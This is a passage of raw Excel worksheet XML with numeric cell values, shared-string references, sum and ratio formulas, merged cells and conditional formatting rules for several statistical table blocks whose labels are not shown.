        <v>4772</v>
      </c>
      <c r="O31" s="262" t="s">
        <v>1765</v>
      </c>
      <c r="S31" s="214"/>
    </row>
    <row r="32" spans="1:19" ht="25.5">
      <c r="A32" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B32" s="281">
        <v>5</v>
      </c>
      <c r="C32" s="281">
        <v>32</v>
      </c>
      <c r="D32" s="281">
        <v>37</v>
      </c>
      <c r="E32" s="281">
        <v>108</v>
      </c>
      <c r="F32" s="281">
        <v>119</v>
      </c>
      <c r="G32" s="281">
        <v>227</v>
      </c>
      <c r="H32" s="281">
        <v>0</v>
      </c>
      <c r="I32" s="281">
        <v>24</v>
      </c>
      <c r="J32" s="454">
        <v>61</v>
      </c>
      <c r="K32" s="449">
        <v>6</v>
      </c>
      <c r="L32" s="454">
        <v>95</v>
      </c>
      <c r="M32" s="449">
        <v>3</v>
      </c>
      <c r="N32" s="454">
        <v>4</v>
      </c>
      <c r="S32" s="214"/>
    </row>
    <row r="33" spans="1:19">
      <c r="A33" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B33" s="364" t="s">
        <v>4615</v>
      </c>
      <c r="C33" s="364" t="s">
        <v>4616</v>
      </c>
      <c r="D33" s="364" t="s">
        <v>4617</v>
      </c>
      <c r="E33" s="364" t="s">
        <v>4618</v>
      </c>
      <c r="F33" s="364" t="s">
        <v>4619</v>
      </c>
      <c r="G33" s="364" t="s">
        <v>4619</v>
      </c>
      <c r="H33" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I33" s="364" t="s">
        <v>4620</v>
      </c>
      <c r="J33" s="456" t="s">
        <v>4621</v>
      </c>
      <c r="K33" s="613">
        <v>0.46666666666666667</v>
      </c>
      <c r="L33" s="456">
        <v>0.92121212121212115</v>
      </c>
      <c r="M33" s="364">
        <v>0.24545454545454545</v>
      </c>
      <c r="N33" s="456">
        <v>0.59090909090909094</v>
      </c>
      <c r="S33" s="214"/>
    </row>
    <row r="34" spans="1:19">
      <c r="A34" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B34" s="281">
        <f t="shared" ref="B34:J34" si="9">B36+B35</f>
        <v>1749199</v>
      </c>
      <c r="C34" s="281">
        <f t="shared" si="9"/>
        <v>354610</v>
      </c>
      <c r="D34" s="281">
        <f t="shared" si="9"/>
        <v>2103809</v>
      </c>
      <c r="E34" s="281">
        <f t="shared" si="9"/>
        <v>6013124</v>
      </c>
      <c r="F34" s="281">
        <f t="shared" si="9"/>
        <v>3281760</v>
      </c>
      <c r="G34" s="281">
        <f t="shared" si="9"/>
        <v>9291759</v>
      </c>
      <c r="H34" s="281">
        <f t="shared" si="9"/>
        <v>6422</v>
      </c>
      <c r="I34" s="281">
        <f t="shared" si="9"/>
        <v>3565691</v>
      </c>
      <c r="J34" s="311">
        <f t="shared" si="9"/>
        <v>5663091</v>
      </c>
      <c r="K34" s="656">
        <f>K35+K36</f>
        <v>4714302</v>
      </c>
      <c r="L34" s="449">
        <f t="shared" ref="L34" si="10">L35+L36</f>
        <v>24163551</v>
      </c>
      <c r="M34" s="656">
        <f t="shared" ref="M34" si="11">M35+M36</f>
        <v>20491</v>
      </c>
      <c r="N34" s="458">
        <f t="shared" ref="N34" si="12">N35+N36</f>
        <v>2510299</v>
      </c>
      <c r="O34" s="572"/>
      <c r="P34" s="572"/>
      <c r="Q34" s="572"/>
      <c r="S34" s="214"/>
    </row>
    <row r="35" spans="1:19">
      <c r="A35" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B35" s="281">
        <v>12783</v>
      </c>
      <c r="C35" s="281">
        <v>4878</v>
      </c>
      <c r="D35" s="281">
        <v>17661</v>
      </c>
      <c r="E35" s="281">
        <v>378848</v>
      </c>
      <c r="F35" s="281">
        <v>73630</v>
      </c>
      <c r="G35" s="281">
        <v>449353</v>
      </c>
      <c r="H35" s="281">
        <v>2</v>
      </c>
      <c r="I35" s="281">
        <v>8104</v>
      </c>
      <c r="J35" s="454">
        <v>25763</v>
      </c>
      <c r="K35" s="314">
        <v>318431</v>
      </c>
      <c r="L35" s="454">
        <v>1639887</v>
      </c>
      <c r="M35" s="281">
        <v>19899</v>
      </c>
      <c r="N35" s="454">
        <v>2507989</v>
      </c>
      <c r="O35" s="572"/>
      <c r="P35" s="572"/>
      <c r="Q35" s="572"/>
      <c r="S35" s="214"/>
    </row>
    <row r="36" spans="1:19">
      <c r="A36" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B36" s="281">
        <v>1736416</v>
      </c>
      <c r="C36" s="281">
        <v>349732</v>
      </c>
      <c r="D36" s="281">
        <v>2086148</v>
      </c>
      <c r="E36" s="281">
        <v>5634276</v>
      </c>
      <c r="F36" s="281">
        <v>3208130</v>
      </c>
      <c r="G36" s="281">
        <v>8842406</v>
      </c>
      <c r="H36" s="281">
        <v>6420</v>
      </c>
      <c r="I36" s="281">
        <v>3557587</v>
      </c>
      <c r="J36" s="454">
        <v>5637328</v>
      </c>
      <c r="K36" s="314">
        <v>4395871</v>
      </c>
      <c r="L36" s="454">
        <v>22523664</v>
      </c>
      <c r="M36" s="281">
        <v>592</v>
      </c>
      <c r="N36" s="454">
        <v>2310</v>
      </c>
      <c r="O36" s="572"/>
      <c r="P36" s="572"/>
      <c r="Q36" s="572"/>
      <c r="S36" s="214"/>
    </row>
    <row r="37" spans="1:19" ht="26.25" thickBot="1">
      <c r="A37" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B37" s="283">
        <f t="shared" ref="B37:J37" si="13">B36/B35</f>
        <v>135.83790972385199</v>
      </c>
      <c r="C37" s="283">
        <f t="shared" si="13"/>
        <v>71.695776957769581</v>
      </c>
      <c r="D37" s="283">
        <f t="shared" si="13"/>
        <v>118.12173716097617</v>
      </c>
      <c r="E37" s="283">
        <f t="shared" si="13"/>
        <v>14.872128135822281</v>
      </c>
      <c r="F37" s="283">
        <f t="shared" si="13"/>
        <v>43.570962922721719</v>
      </c>
      <c r="G37" s="283">
        <f t="shared" si="13"/>
        <v>19.678083822740696</v>
      </c>
      <c r="H37" s="283">
        <f t="shared" si="13"/>
        <v>3210</v>
      </c>
      <c r="I37" s="283">
        <f t="shared" si="13"/>
        <v>438.99148568608092</v>
      </c>
      <c r="J37" s="313">
        <f t="shared" si="13"/>
        <v>218.81488957031402</v>
      </c>
      <c r="K37" s="368">
        <v>13.834</v>
      </c>
      <c r="L37" s="457">
        <v>13.778600000000001</v>
      </c>
      <c r="M37" s="459">
        <v>2.9700000000000001E-2</v>
      </c>
      <c r="N37" s="457">
        <v>4.0000000000000002E-4</v>
      </c>
      <c r="O37" s="572"/>
      <c r="P37" s="572"/>
      <c r="Q37" s="572"/>
      <c r="S37" s="214"/>
    </row>
    <row r="38" spans="1:19" ht="14.25" customHeight="1" thickTop="1">
      <c r="A38" s="734" t="s">
        <v>4472</v>
      </c>
      <c r="B38" s="735"/>
      <c r="C38" s="735"/>
      <c r="D38" s="735"/>
      <c r="E38" s="735"/>
      <c r="F38" s="735"/>
      <c r="G38" s="735"/>
      <c r="H38" s="735"/>
      <c r="I38" s="735"/>
      <c r="J38" s="735"/>
      <c r="K38" s="735"/>
      <c r="L38" s="735"/>
      <c r="M38" s="735"/>
      <c r="N38" s="736"/>
      <c r="O38" s="572"/>
      <c r="P38" s="572"/>
      <c r="Q38" s="572"/>
      <c r="S38" s="214"/>
    </row>
    <row r="39" spans="1:19" ht="14.25" customHeight="1">
      <c r="A39" s="448" t="s">
        <v>640</v>
      </c>
      <c r="B39" s="546">
        <v>0.26967994498529679</v>
      </c>
      <c r="C39" s="546">
        <v>0.63245553203367588</v>
      </c>
      <c r="D39" s="546">
        <v>0.65366101862718362</v>
      </c>
      <c r="E39" s="546">
        <v>0.70710678118654757</v>
      </c>
      <c r="F39" s="546">
        <v>0.70710678118654757</v>
      </c>
      <c r="G39" s="546">
        <v>0.7977240352174656</v>
      </c>
      <c r="H39" s="546">
        <v>0</v>
      </c>
      <c r="I39" s="546">
        <v>0.47673129462279618</v>
      </c>
      <c r="J39" s="547">
        <v>0.70710678118654757</v>
      </c>
      <c r="K39" s="548">
        <v>0.60302299999999998</v>
      </c>
      <c r="L39" s="549">
        <v>0.75075700000000001</v>
      </c>
      <c r="M39" s="550">
        <v>0.47673100000000002</v>
      </c>
      <c r="N39" s="549">
        <v>0.75678699999999999</v>
      </c>
      <c r="O39" s="214"/>
      <c r="S39" s="214"/>
    </row>
    <row r="40" spans="1:19" ht="36.75" customHeight="1">
      <c r="A40" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B40" s="260" t="s">
        <v>4786</v>
      </c>
      <c r="C40" s="260" t="s">
        <v>4787</v>
      </c>
      <c r="D40" s="260" t="s">
        <v>4788</v>
      </c>
      <c r="E40" s="260" t="s">
        <v>4789</v>
      </c>
      <c r="F40" s="260" t="s">
        <v>4790</v>
      </c>
      <c r="G40" s="260" t="s">
        <v>4791</v>
      </c>
      <c r="H40" s="260" t="s">
        <v>1786</v>
      </c>
      <c r="I40" s="260" t="s">
        <v>4792</v>
      </c>
      <c r="J40" s="312" t="s">
        <v>4793</v>
      </c>
      <c r="K40" s="436" t="s">
        <v>4846</v>
      </c>
      <c r="L40" s="437" t="s">
        <v>4848</v>
      </c>
      <c r="M40" s="315" t="s">
        <v>4847</v>
      </c>
      <c r="N40" s="437" t="s">
        <v>4849</v>
      </c>
      <c r="O40" s="262"/>
      <c r="S40" s="214"/>
    </row>
    <row r="41" spans="1:19" ht="25.5">
      <c r="A41" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B41" s="281">
        <v>15</v>
      </c>
      <c r="C41" s="281">
        <v>45</v>
      </c>
      <c r="D41" s="281">
        <v>60</v>
      </c>
      <c r="E41" s="281">
        <v>155</v>
      </c>
      <c r="F41" s="281">
        <v>160</v>
      </c>
      <c r="G41" s="281">
        <v>315</v>
      </c>
      <c r="H41" s="281">
        <v>2</v>
      </c>
      <c r="I41" s="281">
        <v>39</v>
      </c>
      <c r="J41" s="311">
        <v>97</v>
      </c>
      <c r="K41" s="451">
        <v>12</v>
      </c>
      <c r="L41" s="454">
        <v>133</v>
      </c>
      <c r="M41" s="449">
        <v>6</v>
      </c>
      <c r="N41" s="454">
        <v>12</v>
      </c>
      <c r="S41" s="214"/>
    </row>
    <row r="42" spans="1:19">
      <c r="A42" s="369" t="s">
        <v>4147</v>
      </c>
      <c r="B42" s="364" t="s">
        <v>4794</v>
      </c>
      <c r="C42" s="364" t="s">
        <v>4641</v>
      </c>
      <c r="D42" s="364" t="s">
        <v>4656</v>
      </c>
      <c r="E42" s="364" t="s">
        <v>4775</v>
      </c>
      <c r="F42" s="364" t="s">
        <v>4775</v>
      </c>
      <c r="G42" s="364" t="s">
        <v>4552</v>
      </c>
      <c r="H42" s="364" t="s">
        <v>4795</v>
      </c>
      <c r="I42" s="364" t="s">
        <v>4796</v>
      </c>
      <c r="J42" s="365" t="s">
        <v>4775</v>
      </c>
      <c r="K42" s="455">
        <v>0.36359999999999998</v>
      </c>
      <c r="L42" s="456">
        <v>0.56359999999999999</v>
      </c>
      <c r="M42" s="450">
        <v>0.2273</v>
      </c>
      <c r="N42" s="456">
        <v>0.57269999999999999</v>
      </c>
      <c r="S42" s="214"/>
    </row>
    <row r="43" spans="1:19">
      <c r="A43" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B43" s="281">
        <f t="shared" ref="B43:J43" si="14">B45+B44</f>
        <v>84</v>
      </c>
      <c r="C43" s="281">
        <f t="shared" si="14"/>
        <v>4851</v>
      </c>
      <c r="D43" s="281">
        <f t="shared" si="14"/>
        <v>4935</v>
      </c>
      <c r="E43" s="281">
        <f t="shared" si="14"/>
        <v>171068</v>
      </c>
      <c r="F43" s="281">
        <f t="shared" si="14"/>
        <v>71487</v>
      </c>
      <c r="G43" s="281">
        <f t="shared" si="14"/>
        <v>242488</v>
      </c>
      <c r="H43" s="281">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="I43" s="281">
        <f t="shared" si="14"/>
        <v>7243</v>
      </c>
      <c r="J43" s="281">
        <f t="shared" si="14"/>
        <v>12178</v>
      </c>
      <c r="K43" s="451">
        <f>K44+K45</f>
        <v>318392</v>
      </c>
      <c r="L43" s="458">
        <f t="shared" ref="L43:N43" si="15">L44+L45</f>
        <v>386837</v>
      </c>
      <c r="M43" s="449">
        <f t="shared" si="15"/>
        <v>19893</v>
      </c>
      <c r="N43" s="458">
        <f t="shared" si="15"/>
        <v>2507841</v>
      </c>
      <c r="O43" s="572"/>
      <c r="P43" s="572"/>
      <c r="Q43" s="572"/>
      <c r="S43" s="214"/>
    </row>
    <row r="44" spans="1:19">
      <c r="A44" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B44" s="281">
        <v>84</v>
      </c>
      <c r="C44" s="281">
        <v>4851</v>
      </c>
      <c r="D44" s="281">
        <v>4935</v>
      </c>
      <c r="E44" s="281">
        <v>171068</v>
      </c>
      <c r="F44" s="281">
        <v>71487</v>
      </c>
      <c r="G44" s="281">
        <v>242488</v>
      </c>
      <c r="H44" s="281">
        <v>0</v>
      </c>
      <c r="I44" s="281">
        <v>7243</v>
      </c>
      <c r="J44" s="311">
        <v>12178</v>
      </c>
      <c r="K44" s="451">
        <v>318392</v>
      </c>
      <c r="L44" s="454">
        <v>386837</v>
      </c>
      <c r="M44" s="449">
        <v>19893</v>
      </c>
      <c r="N44" s="454">
        <v>2507841</v>
      </c>
      <c r="O44" s="572"/>
      <c r="P44" s="572"/>
      <c r="Q44" s="572"/>
      <c r="S44" s="214"/>
    </row>
    <row r="45" spans="1:19">
      <c r="A45" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B45" s="281">
        <v>0</v>
      </c>
      <c r="C45" s="281">
        <v>0</v>
      </c>
      <c r="D45" s="281">
        <v>0</v>
      </c>
      <c r="E45" s="281">
        <v>0</v>
      </c>
      <c r="F45" s="281">
        <v>0</v>
      </c>
      <c r="G45" s="281">
        <v>0</v>
      </c>
      <c r="H45" s="281">
        <v>0</v>
      </c>
      <c r="I45" s="281">
        <v>0</v>
      </c>
      <c r="J45" s="311">
        <v>0</v>
      </c>
      <c r="K45" s="451">
        <v>0</v>
      </c>
      <c r="L45" s="454">
        <v>0</v>
      </c>
      <c r="M45" s="449">
        <v>0</v>
      </c>
      <c r="N45" s="454">
        <v>0</v>
      </c>
      <c r="O45" s="572"/>
      <c r="P45" s="572"/>
      <c r="Q45" s="572"/>
      <c r="S45" s="214"/>
    </row>
    <row r="46" spans="1:19" ht="26.25" thickBot="1">
      <c r="A46" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B46" s="283">
        <v>0</v>
      </c>
      <c r="C46" s="283">
        <v>0</v>
      </c>
      <c r="D46" s="283">
        <v>0</v>
      </c>
      <c r="E46" s="283">
        <v>0</v>
      </c>
      <c r="F46" s="283">
        <v>0</v>
      </c>
      <c r="G46" s="283">
        <v>0</v>
      </c>
      <c r="H46" s="283">
        <v>0</v>
      </c>
      <c r="I46" s="283">
        <v>0</v>
      </c>
      <c r="J46" s="283">
        <v>0</v>
      </c>
      <c r="K46" s="368">
        <v>0</v>
      </c>
      <c r="L46" s="457">
        <v>0</v>
      </c>
      <c r="M46" s="459">
        <v>0</v>
      </c>
      <c r="N46" s="457">
        <v>0</v>
      </c>
      <c r="O46" s="572"/>
      <c r="P46" s="572"/>
      <c r="Q46" s="572"/>
      <c r="S46" s="214"/>
    </row>
    <row r="47" spans="1:19" ht="14.25" customHeight="1" thickTop="1" thickBot="1">
      <c r="A47" s="730" t="s">
        <v>4582</v>
      </c>
      <c r="B47" s="731"/>
      <c r="C47" s="731"/>
      <c r="D47" s="731"/>
      <c r="E47" s="731"/>
      <c r="F47" s="731"/>
      <c r="G47" s="731"/>
      <c r="H47" s="731"/>
      <c r="I47" s="731"/>
      <c r="J47" s="731"/>
      <c r="K47" s="731"/>
      <c r="L47" s="731"/>
      <c r="M47" s="731"/>
      <c r="N47" s="732"/>
      <c r="O47" s="572"/>
      <c r="P47" s="572"/>
      <c r="Q47" s="572"/>
      <c r="S47" s="214"/>
    </row>
    <row r="48" spans="1:19" ht="18.75" customHeight="1" thickTop="1">
      <c r="A48" s="261" t="s">
        <v>640</v>
      </c>
      <c r="B48" s="567">
        <v>0.794825</v>
      </c>
      <c r="C48" s="567">
        <v>0.64597099999999996</v>
      </c>
      <c r="D48" s="567">
        <v>0.84367599999999998</v>
      </c>
      <c r="E48" s="567">
        <v>0.91473199999999999</v>
      </c>
      <c r="F48" s="567">
        <v>0.98424500000000004</v>
      </c>
      <c r="G48" s="567">
        <v>0.98219400000000001</v>
      </c>
      <c r="H48" s="567">
        <v>9.5346E-2</v>
      </c>
      <c r="I48" s="567">
        <v>0.58186000000000004</v>
      </c>
      <c r="J48" s="568">
        <v>0.854105</v>
      </c>
      <c r="K48" s="551">
        <v>0.67410599999999998</v>
      </c>
      <c r="L48" s="552">
        <v>0.94505600000000001</v>
      </c>
      <c r="M48" s="553">
        <v>0.49543300000000001</v>
      </c>
      <c r="N48" s="552">
        <v>0.786242</v>
      </c>
      <c r="O48" s="733" t="s">
        <v>2351</v>
      </c>
      <c r="P48" s="733"/>
      <c r="Q48" s="733"/>
      <c r="S48" s="214"/>
    </row>
    <row r="49" spans="1:19" ht="34.5" customHeight="1">
      <c r="A49" s="22" t="s">
        <v>4150</v>
      </c>
      <c r="B49" s="260" t="s">
        <v>4622</v>
      </c>
      <c r="C49" s="260" t="s">
        <v>4623</v>
      </c>
      <c r="D49" s="260" t="s">
        <v>4624</v>
      </c>
      <c r="E49" s="260" t="s">
        <v>4625</v>
      </c>
      <c r="F49" s="260" t="s">
        <v>4626</v>
      </c>
      <c r="G49" s="260" t="s">
        <v>4627</v>
      </c>
      <c r="H49" s="260" t="s">
        <v>4130</v>
      </c>
      <c r="I49" s="260" t="s">
        <v>4628</v>
      </c>
      <c r="J49" s="312" t="s">
        <v>4629</v>
      </c>
      <c r="K49" s="436" t="s">
        <v>4770</v>
      </c>
      <c r="L49" s="437" t="s">
        <v>4843</v>
      </c>
      <c r="M49" s="315" t="s">
        <v>4771</v>
      </c>
      <c r="N49" s="437" t="s">
        <v>4844</v>
      </c>
      <c r="O49" s="262" t="s">
        <v>1766</v>
      </c>
      <c r="S49" s="214"/>
    </row>
    <row r="50" spans="1:19" ht="25.5">
      <c r="A50" s="22" t="s">
        <v>4151</v>
      </c>
      <c r="B50" s="281">
        <v>9</v>
      </c>
      <c r="C50" s="281">
        <v>41</v>
      </c>
      <c r="D50" s="281">
        <v>49</v>
      </c>
      <c r="E50" s="281">
        <v>136</v>
      </c>
      <c r="F50" s="281">
        <v>151</v>
      </c>
      <c r="G50" s="281">
        <v>292</v>
      </c>
      <c r="H50" s="281">
        <v>1</v>
      </c>
      <c r="I50" s="281">
        <v>34</v>
      </c>
      <c r="J50" s="311">
        <v>84</v>
      </c>
      <c r="K50" s="451">
        <v>10</v>
      </c>
      <c r="L50" s="454">
        <v>118</v>
      </c>
      <c r="M50" s="449">
        <v>4</v>
      </c>
      <c r="N50" s="454">
        <v>6</v>
      </c>
      <c r="S50" s="214"/>
    </row>
    <row r="51" spans="1:19">
      <c r="A51" s="366" t="s">
        <v>4147</v>
      </c>
      <c r="B51" s="364" t="s">
        <v>4615</v>
      </c>
      <c r="C51" s="364" t="s">
        <v>4616</v>
      </c>
      <c r="D51" s="364" t="s">
        <v>4617</v>
      </c>
      <c r="E51" s="364" t="s">
        <v>4630</v>
      </c>
      <c r="F51" s="364" t="s">
        <v>4619</v>
      </c>
      <c r="G51" s="364" t="s">
        <v>4619</v>
      </c>
      <c r="H51" s="364" t="s">
        <v>4141</v>
      </c>
      <c r="I51" s="364" t="s">
        <v>4620</v>
      </c>
      <c r="J51" s="365" t="s">
        <v>4559</v>
      </c>
      <c r="K51" s="455" t="s">
        <v>4643</v>
      </c>
      <c r="L51" s="456" t="s">
        <v>4845</v>
      </c>
      <c r="M51" s="450" t="s">
        <v>4766</v>
      </c>
      <c r="N51" s="456">
        <v>0.59090909090909094</v>
      </c>
      <c r="S51" s="214"/>
    </row>
    <row r="52" spans="1:19">
      <c r="A52" s="369" t="s">
        <v>4457</v>
      </c>
      <c r="B52" s="281">
        <f t="shared" ref="B52:J52" si="16">B54+B53</f>
        <v>1726323</v>
      </c>
      <c r="C52" s="281">
        <f t="shared" si="16"/>
        <v>342024</v>
      </c>
      <c r="D52" s="281">
        <f t="shared" si="16"/>
        <v>2070128</v>
      </c>
      <c r="E52" s="281">
        <f t="shared" si="16"/>
        <v>3608813</v>
      </c>
      <c r="F52" s="281">
        <f t="shared" si="16"/>
        <v>2055993</v>
      </c>
      <c r="G52" s="281">
        <f t="shared" si="16"/>
        <v>3592622</v>
      </c>
      <c r="H52" s="281">
        <f t="shared" si="16"/>
        <v>24</v>
      </c>
      <c r="I52" s="281">
        <f t="shared" si="16"/>
        <v>3555267</v>
      </c>
      <c r="J52" s="311">
        <f t="shared" si="16"/>
        <v>2086849</v>
      </c>
      <c r="K52" s="655">
        <f>K53+K54</f>
        <v>340271</v>
      </c>
      <c r="L52" s="458">
        <f t="shared" ref="L52" si="17">L53+L54</f>
        <v>3166026</v>
      </c>
      <c r="M52" s="314">
        <f t="shared" ref="M52" si="18">M53+M54</f>
        <v>19966</v>
      </c>
      <c r="N52" s="458">
        <f t="shared" ref="N52" si="19">N53+N54</f>
        <v>2509100</v>
      </c>
      <c r="O52" s="572"/>
      <c r="P52" s="572"/>
      <c r="Q52" s="572"/>
      <c r="S52" s="214"/>
    </row>
    <row r="53" spans="1:19">
      <c r="A53" s="369" t="s">
        <v>4455</v>
      </c>
      <c r="B53" s="281">
        <v>12763</v>
      </c>
      <c r="C53" s="281">
        <v>4855</v>
      </c>
      <c r="D53" s="281">
        <v>17619</v>
      </c>
      <c r="E53" s="281">
        <v>378145</v>
      </c>
      <c r="F53" s="281">
        <v>72189</v>
      </c>
      <c r="G53" s="281">
        <v>243310</v>
      </c>
      <c r="H53" s="281">
        <v>1</v>
      </c>
      <c r="I53" s="281">
        <v>7287</v>
      </c>
      <c r="J53" s="311">
        <v>24889</v>
      </c>
      <c r="K53" s="451">
        <v>318411</v>
      </c>
      <c r="L53" s="454">
        <v>1638479</v>
      </c>
      <c r="M53" s="449">
        <v>19898</v>
      </c>
      <c r="N53" s="454">
        <v>2507979</v>
      </c>
      <c r="O53" s="572"/>
      <c r="P53" s="572"/>
      <c r="Q53" s="572"/>
      <c r="S53" s="214"/>
    </row>
    <row r="54" spans="1:19">
      <c r="A54" s="369" t="s">
        <v>4456</v>
      </c>
      <c r="B54" s="281">
        <v>1713560</v>
      </c>
      <c r="C54" s="281">
        <v>337169</v>
      </c>
      <c r="D54" s="281">
        <v>2052509</v>
      </c>
      <c r="E54" s="281">
        <v>3230668</v>
      </c>
      <c r="F54" s="281">
        <v>1983804</v>
      </c>
      <c r="G54" s="281">
        <v>3349312</v>
      </c>
      <c r="H54" s="281">
        <v>23</v>
      </c>
      <c r="I54" s="281">
        <v>3547980</v>
      </c>
      <c r="J54" s="311">
        <v>2061960</v>
      </c>
      <c r="K54" s="451">
        <v>21860</v>
      </c>
      <c r="L54" s="454">
        <v>1527547</v>
      </c>
      <c r="M54" s="449">
        <v>68</v>
      </c>
      <c r="N54" s="454">
        <v>1121</v>
      </c>
      <c r="O54" s="572"/>
      <c r="P54" s="572"/>
      <c r="Q54" s="572"/>
      <c r="S54" s="214"/>
    </row>
    <row r="55" spans="1:19" ht="26.25" thickBot="1">
      <c r="A55" s="282" t="s">
        <v>4916</v>
      </c>
      <c r="B55" s="283">
        <f t="shared" ref="B55:J55" si="20">B54/B53</f>
        <v>134.2599702264358</v>
      </c>
      <c r="C55" s="283">
        <f t="shared" si="20"/>
        <v>69.447785787847579</v>
      </c>
      <c r="D55" s="283">
        <f t="shared" si="20"/>
        <v>116.49406890288893</v>
      </c>
      <c r="E55" s="283">
        <f t="shared" si="20"/>
        <v>8.543463486228827</v>
      </c>
      <c r="F55" s="283">
        <f t="shared" si="20"/>
        <v>27.480696505007689</v>
      </c>
      <c r="G55" s="283">
        <f t="shared" si="20"/>
        <v>13.765615880974888</v>
      </c>
      <c r="H55" s="283">
        <f t="shared" si="20"/>
        <v>23</v>
      </c>
      <c r="I55" s="283">
        <f t="shared" si="20"/>
        <v>486.89172498970771</v>
      </c>
      <c r="J55" s="283">
        <f t="shared" si="20"/>
        <v>82.846237293583513</v>
      </c>
      <c r="K55" s="368">
        <v>7.0199999999999999E-2</v>
      </c>
      <c r="L55" s="457">
        <v>0.97809999999999997</v>
      </c>
      <c r="M55" s="459">
        <v>3.3999999999999998E-3</v>
      </c>
      <c r="N55" s="457">
        <v>1E-4</v>
      </c>
      <c r="O55" s="572"/>
      <c r="P55" s="572"/>
      <c r="Q55" s="572"/>
      <c r="S55" s="214"/>
    </row>
    <row r="56" spans="1:19" ht="13.5" thickTop="1"/>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="B2:J2"/>
    <mergeCell ref="K2:L2"/>
    <mergeCell ref="M2:N2"/>
    <mergeCell ref="A4:N4"/>
    <mergeCell ref="O48:Q48"/>
    <mergeCell ref="A11:N11"/>
    <mergeCell ref="A20:N20"/>
    <mergeCell ref="A29:N29"/>
    <mergeCell ref="A38:N38"/>
    <mergeCell ref="A47:N47"/>
  </mergeCells>
  <conditionalFormatting sqref="B16:J18">
    <cfRule type="expression" dxfId="333" priority="367">
      <formula>IF(B16&gt;B7,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B28:J28">
    <cfRule type="expression" dxfId="332" priority="36">
      <formula>IF(B28&gt;B19,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B35:J35 B36:N36">
    <cfRule type="expression" dxfId="331" priority="45">
      <formula>IF(B35&gt;B8,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B37:J37">
    <cfRule type="expression" dxfId="330" priority="37">
      <formula>IF(B37&gt;B28,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B51:J51 K54:N54">
    <cfRule type="expression" dxfId="329" priority="40">
      <formula>IF(B51&gt;B33,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B55:J55">
    <cfRule type="expression" dxfId="328" priority="34">
      <formula>IF(B55&gt;B46,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B7:N7">
    <cfRule type="expression" dxfId="327" priority="463">
      <formula>IF(OR(B7&lt;B8,B7&lt;B9),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B12:N12">
    <cfRule type="expression" dxfId="326" priority="124">
      <formula>IF(B12&gt;B5,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B19:N19">
    <cfRule type="expression" dxfId="325" priority="127">
      <formula>IF(B19&gt;B10,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B21:N21">
    <cfRule type="expression" dxfId="324" priority="125">
      <formula>IF(B21&lt;B12,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B23:N23">
    <cfRule type="expression" dxfId="323" priority="323">
      <formula>IF(B23&gt;B14,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B24:N24 B26:J27">
    <cfRule type="expression" dxfId="322" priority="257">
      <formula>IF(B24&lt;B15,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B39:N39">
    <cfRule type="expression" dxfId="321" priority="39">
      <formula>IF(B39&gt;B30,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B41:N41">
    <cfRule type="expression" dxfId="320" priority="43">
      <formula>IF(B41&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B46:N46">
    <cfRule type="expression" dxfId="319" priority="35">
      <formula>IF(B46&gt;B37,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B48:N48">
    <cfRule type="expression" dxfId="318" priority="129">
      <formula>IF(B48&lt;B39,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="B50:N50">
    <cfRule type="expression" dxfId="317" priority="41">
      <formula>IF(B50&lt;B32,1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D6:D9">
    <cfRule type="expression" dxfId="316" priority="506">
      <formula>IF(OR(D6&lt;B6,D6&lt;C6),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D14 D16:D18">
    <cfRule type="expression" dxfId="315" priority="433">
      <formula>IF(OR(D14&lt;B14,D14&lt;C14),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D23:D24 D26:D27">
    <cfRule type="expression" dxfId="314" priority="33">
      <formula>IF(OR(D23&lt;B23,D23&lt;C23),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D32 D35:D36">
    <cfRule type="expression" dxfId="313" priority="27">
      <formula>IF(OR(D32&lt;B32,D32&lt;C32),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D41 D43:D45">
    <cfRule type="expression" dxfId="312" priority="21">
      <formula>IF(OR(D41&lt;B41,D41&lt;C41),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="D50:D51">
    <cfRule type="expression" dxfId="311" priority="15">
      <formula>IF(OR(D50&lt;B50,D50&lt;C50),1,0)</formula>
    </cfRule>
  </conditionalFormatting>
